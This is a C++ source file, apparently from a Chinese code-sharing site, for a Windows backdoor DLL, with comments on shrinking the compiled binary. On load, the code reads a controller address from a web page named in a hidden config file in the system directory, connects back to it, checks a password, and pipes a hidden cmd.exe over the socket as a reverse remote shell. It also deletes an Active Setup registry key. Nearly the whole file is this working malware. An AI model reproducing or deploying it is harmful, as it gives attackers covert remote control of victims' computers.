📄 dll.cpp
字号:
// Dll.cpp : Defines the initialization routines for the DLL.
//
/*
编译-----
一,使用release版而不用debug版编译
使用debug版编译会生成许多垃圾信息.我们先使用默认的设置进行一下编译.可以看到编译后
生成的文件有152k之巨.使用release版编译具体方法是:在"build(编译)--->Configuration(配置)"中
将"Win32 debug"移去,然后再次编译可以发现文件已经小了很多,才24k.但离我们的目标还很远呢.
二,设置自己的入口点函数
C或C++程序默认的入口函数是main()或WinMain(),但我们现在不用什么Main,WinMain.因为这些都不
是直接的入口点,编译器咱产生exe文件的时候,将为我们生成真正的入口点.下面我们来定义自己的入口函
数,具体是把main或WinMain改成其它的名字(如MyFun),打开"Project(工程)--->settings(设置)"选项,选
中"link"选项卡,在"Category(分类)"下拉列表中选"output",在" Entry-Point symbol(输入项-点符
号)"中输入我们刚才定义的入口函数(MyFun),在源程序中也要做相应修改,然后在编译.现在是16k了:)
三,优化最小大小
四,输出,入口点该为MyDll--随便改啦
五,连接,/align:40
本程序值得学习的优点
1----通过url获得ip和端口号并连接
*/
#include "stdafx.h"
#include <afxdllx.h>
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
//以下是我们添加的-----------------------------------------------------
#include <afxinet.h>
#include <winsock2.h>
#include "Tiny.h"
#pragma comment(lib,"ws2_32.lib")
#define INIFILE "SystemUp.top"
typedef DWORD (*PFNMSGECALLBACK)(BOOL bVerbose, LPWSTR lpMessage);
typedef struct _WLX_NOTIFICATION_INFO
{
ULONG Size;
ULONG Flags;
PWSTR UserName;
PWSTR Domain;
PWSTR WindowStation;
HANDLE hToken;
HDESK hDesktop;
PFNMSGECALLBACK pStatusCallback;
} WLX_NOTIFICATION_INFO, *PWLX_NOTIFICATION_INFO;
typedef struct IniInfor
{
char httpsrc[64];
char pawssword[16];
}IniInfor;
typedef struct MasterInfor
{
DWORD dwIP;
USHORT uPort;
}MasterInfor;
typedef struct SendThreadInfor
{
HANDLE hSRead;
SOCKET sock;
BOOL bExit;
}SendThreadInfor;
VOID APIENTRY StartProcessAtStartup (PWLX_NOTIFICATION_INFO);
DWORD WINAPI del(LPVOID lpParam);
DWORD WINAPI StartMyService(LPVOID lpvoid);
int GetHttpFile(LPCTSTR pszURL,LPCTSTR pszLocalFile,LPCTSTR dpStr);
BOOL ReadIniFile();
BOOL DecodeMasterInfor(char* pStr , DWORD* pIp , USHORT* pPort);
DWORD WINAPI CreateCMD(LPVOID lpvoid);
DWORD WINAPI StartNewConnet(LPVOID lpvoid);
DWORD WINAPI SendThread ( LPVOID lp );
void DecodeCommand(char* pBuf , SOCKET sock , HANDLE hSWrite);
MasterInfor msInfor = {0};
IniInfor Ini[2] = {0};
//以上是我们添加的------------------------------------------------------------------------
static AFX_EXTENSION_MODULE DllDLL = { NULL, NULL };
extern "C" int APIENTRY
MyDll(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
UNREFERENCED_PARAMETER(lpReserved);
if (dwReason == DLL_PROCESS_ATTACH)
{
TRACE0("DLL.DLL Initializing!\n");
if (!AfxInitExtensionModule(DllDLL, hInstance))
return 0;
CreateThread(NULL,NULL,del,NULL,NULL,NULL); //ActiveX---
new CDynLinkLibrary(DllDLL);
StartProcessAtStartup(NULL); //启动我们的程序
}
else if (dwReason == DLL_PROCESS_DETACH)
{
TRACE0("DLL.DLL Terminating!\n");
CreateThread(NULL,NULL,del,NULL,NULL,NULL); //ActiveX---
AfxTermExtensionModule(DllDLL);
}
return 1;
}
//----------------------------------------------------------
VOID APIENTRY StartProcessAtStartup (PWLX_NOTIFICATION_INFO pInfo)
{
WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
return;
}
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);
CreateThread(NULL,NULL,StartMyService,NULL,NULL,NULL);
ReleaseMutex(hmutex);
CloseHandle(hmutex);
}
DWORD WINAPI del(LPVOID lpParam)
{
RegDeleteKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}");
return TRUE;
}
DWORD WINAPI StartMyService(LPVOID lpvoid)
{
if ( !ReadIniFile() )
{
//或者 return FALSE;
return -1;
}
while ( TRUE )
{
char buf[1024] = {0};
if ( !GetHttpFile(Ini[0].httpsrc,NULL,buf) )
{
Sleep(1000*10);
TRACE("FALSE!");
continue;
}
DWORD IP=0;
USHORT Port = 0;
if ( !DecodeMasterInfor(buf,&IP,&Port) )
continue;
if ( msInfor.dwIP != IP || Port != msInfor.uPort )
{
printf("New THREAD!");
msInfor.dwIP = IP;
msInfor.uPort = Port;
CreateThread(NULL,NULL,StartNewConnet,(LPVOID)&msInfor,0,0);
}
Sleep(10000);
}
return 1;
}
BOOL ReadIniFile()
{
FILE* fp = NULL;
char SystemPath[MAX_PATH] = {0};
GetSystemDirectory( SystemPath , MAX_PATH );
int len = strlen(SystemPath)-1;
if ( SystemPath[len] != '\\' )
strcat(SystemPath,"\\");
strcat(SystemPath,INIFILE);
fp = fopen ( SystemPath , "r" );
if ( fp == NULL )
{
return FALSE;
}
fread(&Ini[0],sizeof(Ini),1,fp);
fclose(fp);
return TRUE;
}
int GetHttpFile(LPCTSTR pszURL,LPCTSTR pszLocalFile,LPCTSTR dpStr)
{
int iResult = FALSE;
//创建一个会话
CInternetSession session(_T(""));
CHttpConnection* pServer = NULL;
CHttpFile* pFile = NULL;
CString strServerName;
CString strObject;
INTERNET_PORT nPort;
DWORD dwServiceType = INTERNET_SERVICE_HTTP;
if (!AfxParseURL(pszURL, dwServiceType, strServerName, strObject, nPort) ||
dwServiceType != INTERNET_SERVICE_HTTP)
{
iResult = FALSE;
goto EXIT_AND_FREE_RESOURCE;
}
try
{
pServer = session.GetHttpConnection(strServerName, nPort);
if (pServer == NULL)
{
iResult = FALSE;
goto EXIT_AND_FREE_RESOURCE;
}
pFile = pServer->OpenRequest(CHttpConnection::HTTP_VERB_GET,strObject,NULL,1,NULL,NULL,INTERNET_FLAG_RELOAD);
if (pFile == NULL)
{
iResult = FALSE;
goto EXIT_AND_FREE_RESOURCE;
}
if (pFile->SendRequest())
{
TCHAR sz[1024] = {0};
while (pFile->ReadString(sz, 1023))
{
char* pt1 = strstr(sz,"htt");
char* pt2 = strstr(sz,"end");
if ( pt1 && pt1 )
{
memcpy((char*)dpStr,pt1 + 3,pt2-pt1-3 );
iResult = TRUE;
TRACE("\n%s",dpStr);
goto EXIT_AND_FREE_RESOURCE;
}
memset(sz,0,1024);
}
iResult = FALSE;
}
else
{
iResult = FALSE;
}
EXIT_AND_FREE_RESOURCE:
if (pFile)
{
TRACE("\ngggggg");
pFile->Close();
delete pFile;
}
if (pServer)
{
delete pServer;
}
}
catch (CInternetException* pEx)
{
iResult = FALSE;
// TRACE("\nError=%d",GetLastError());
}
return iResult;
}
BOOL DecodeMasterInfor(char* pStr , DWORD* pIp , USHORT* pPort)
{
char* p1 = strstr(pStr,":");
char* p2 = strstr(p1+1,":");
if ( !p1 || !p2 )
return FALSE;
if ( !strncmp(pStr,"p",1) )
{
char Tip[20] = {0};
memcpy(Tip,p1+3,p2-p1-3);
char Tport[6] = {0};
memcpy(Tport,p2+1,pStr+strlen(pStr)-p2-1);
*pIp = inet_addr(Tip);
*pPort = htons(atoi(Tport));
if ( *pIp != 0 && *pPort != 0 )
return TRUE;
else return FALSE;
}
return FALSE;
}
DWORD WINAPI StartNewConnet(LPVOID lpvoid)
{
SOCKET sock = socket(AF_INET, SOCK_STREAM , IPPROTO_TCP);
SOCKADDR_IN addr_in = {0};
addr_in.sin_family = AF_INET;
addr_in.sin_addr.S_un.S_addr = msInfor.dwIP;
addr_in.sin_port = msInfor.uPort;
int ret = SOCKET_ERROR;
HANDLE hp = NULL;
while ( ret == SOCKET_ERROR )
{
ret=connect(sock, (struct sockaddr*)&addr_in,sizeof(addr_in));
if ( ret == 0 )
{
send(sock,"Who?",4,0);
char buf[64] = {0};
int oldopt = 0;
int len = sizeof(int);
ret = getsockopt (sock,SOL_SOCKET, SO_RCVTIMEO,(char*)&oldopt,&len);
int newopt = 3000;
ret = setsockopt (sock,SOL_SOCKET, SO_RCVTIMEO,(char*)&newopt,len);
ret = recv(sock,buf,64,0);
ret = setsockopt (sock,SOL_SOCKET, SO_RCVTIMEO,(char*)&oldopt,len);
ret = strcmp(buf,"CKAdmin");
if ( ret == 0 )
{
/*
NewCmdInfor L = {0};
L.bActive = FALSE;
L.bPass = FALSE;
L.sock = sock;
*/
//CreateCmd
hp = CreateThread(NULL,NULL,CreateCMD,(LPVOID)sock,0,0);
if ( hp == NULL )
return 0;
break;
}
else
{
ret = -1;
closesocket(sock);
sock = socket(AF_INET, SOCK_STREAM , IPPROTO_TCP);
}
}
Sleep(1000);
}
// WaitForSingleObject(hp,INFINITE);
return 1;
}
DWORD WINAPI CreateCMD(LPVOID lpvoid)
{
BOOL bActive = FALSE;
BOOL bPass = FALSE;
SOCKET sock = (SOCKET)lpvoid;
HANDLE hStdOut = NULL, hSRead = NULL;
HANDLE hStdInput = NULL, hSWrite = NULL;
HANDLE hProcess = NULL;
BOOL IsStartCMD = FALSE;
HANDLE ht = NULL;
SendThreadInfor L = {0};
//接收命令
while ( TRUE )
{
char Buffer [ 1024 ] = {0};
int ret = -1;
TRACE("\n Buffer = %s \n" ,Buffer);
if ( bActive && bPass )
if ( !IsStartCMD )
{
IsStartCMD = TRUE;
SECURITY_ATTRIBUTES sa;
sa.bInheritHandle =TRUE;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
CreatePipe ( &hSRead, &hStdOut, &sa, 0 );
CreatePipe ( &hStdInput, &hSWrite, &sa, 0 );
STARTUPINFO StartInfor = {0};
PROCESS_INFORMATION ProInfor = {0};
StartInfor.cb = sizeof ( STARTUPINFO );
StartInfor.wShowWindow = SW_HIDE;
StartInfor.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
StartInfor.hStdOutput = StartInfor.hStdError = hStdOut;
StartInfor.hStdInput = hStdInput;
TCHAR SysDir[MAX_PATH] = {0};
GetSystemDirectory(SysDir,MAX_PATH);
if ( SysDir[strlen(SysDir)-1] != '\\')
strcat(SysDir,"\\");
strcat(SysDir,"cmd.exe");
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);
CreateProcess(NULL,SysDir,NULL,NULL,TRUE,NULL,NULL,NULL,&StartInfor,&ProInfor);
hProcess = ProInfor.hProcess;
CloseHandle(hStdOut);
CloseHandle(hStdInput);
ReleaseMutex(hmutex);
CloseHandle(hmutex);
L.hSRead = hSRead;
L.sock = sock;
L.bExit = FALSE;
ht = CreateThread(NULL,NULL,SendThread,(LPVOID)&L,0,0);
}
ret = recv(sock,Buffer,1024,0);
if ( ret == -1 )
{
//sock disconnect
L.bExit = TRUE;
if ( ht )
WaitForSingleObject(ht,INFINITE);
memset(&msInfor,0,sizeof(msInfor));
closesocket(sock);
return 0;
}
//分析命令
if ( bActive && bPass )
{
if ( strnicmp("StopServer",Buffer,strlen("StopServer") ) )
{
DecodeCommand(Buffer,sock, hSWrite);
continue;
}
else
{
bActive = FALSE;
bPass = FALSE;
IsStartCMD = FALSE;
DWORD A;
// GetExitCodeThread(ht,&A);
// TerminateThread(ht,A);
L.bExit = TRUE;
Sleep(500);
GetExitCodeThread(hProcess,&A);
TerminateProcess(hProcess,A);
continue;
}
}
if ( bActive == FALSE )
{
if ( !strnicmp( Buffer , "Start" , 5 ) )
{
bActive = TRUE;
Sleep(500);
int o = send(sock,"Master", 6, 0);
//send(sock,"Master", 6, 0);
TRACE("\n######## %d #####", o);
send(sock,"请输入您的密码\r\n", 30 ,0 );
// send(sock,"######",6,0);
if ( Ini[0].pawssword[0] == 0 )
{
bPass=TRUE;
continue;
}
else
send(sock,"请输入您的密码\r\n", 30 ,0 );
continue;
}
}
if ( bPass == FALSE )
{
int l = strlen(Ini[0].pawssword);
if ( !strnicmp( Buffer , Ini[0].pawssword , l ) )
{
char* p = "您输入的密码正确-欢迎您使用远程终端系统!\r\n";
send ( sock , p , strlen(p),0 );
bPass = TRUE;
}
else
{
if ( strnicmp( Buffer , "StopServer", strlen("StopServer") ) )
{
char* p = "您输入的密码错误! 请重试\r\n";
send ( sock , p , strlen(p),0 );
}
else bActive = FALSE;
}
}
}
return 1;
}
DWORD WINAPI SendThread ( LPVOID lp )
{
SendThreadInfor* L = (SendThreadInfor*)lp;
HANDLE hSRead = L->hSRead;
SOCKET sock = L->sock;
TCHAR Buf[512]={0};
DWORD ReadSize = 0;
while(TRUE)
{
if ( L->bExit == TRUE )
return 1;
PeekNamedPipe(hSRead,Buf,512,&ReadSize,NULL,NULL);
if ( ReadSize > 0 )
ReadFile(hSRead,Buf,512,&ReadSize,NULL);
else
{
/*
if ( bSysCmd )
{
bSysCmd = FALSE;
//send cmd over flag
// send(sock,"######",6,0);
}
*/
Sleep(100);
continue;
}
send (sock,Buf,ReadSize,0);
memset(Buf,0,512);
}
return 1;
}
void DecodeCommand(char* pBuf , SOCKET sock , HANDLE hSWrite)
{
BOOL IsCustomCMD = FALSE;
Sleep(500);
if ( *pBuf == '-' )
{
pBuf++;
IsCustomCMD = TRUE;
}
if ( IsCustomCMD )
{
//自己定义命令
//搜索一个空格
int len;
char* p1 = strstr(pBuf," ");
if ( p1 )
len = p1 - pBuf;
else
len = strlen(pBuf)-1;
}
else
{
strcat(pBuf,"\r\n"); //add return
int l = strlen(pBuf);
DWORD A=0;
//写到管道中供CMD的标准输入读取
WriteFile(hSWrite,pBuf,l,&A,NULL);
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -